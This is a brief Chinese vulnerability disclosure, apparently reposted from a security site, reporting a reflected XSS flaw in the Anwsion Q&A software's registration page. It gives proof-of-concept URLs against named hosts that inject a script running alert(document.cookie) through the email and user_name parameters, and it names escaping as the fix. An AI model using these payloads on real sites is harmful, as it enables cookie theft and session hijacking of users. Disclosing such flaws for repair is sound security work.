anwsion通杀反射XSS缺陷一枚
http://www.3hack.com/?/account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C
http://wenda.anwsion.com/account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg
参数不只是这个如:
http://wenda.anwsion.com/account/register/user_name-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg
注册地方所以参数的
name-{XSS code}
修复方案: 转义。
查看更多关于anwsion通杀反射XSS - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14352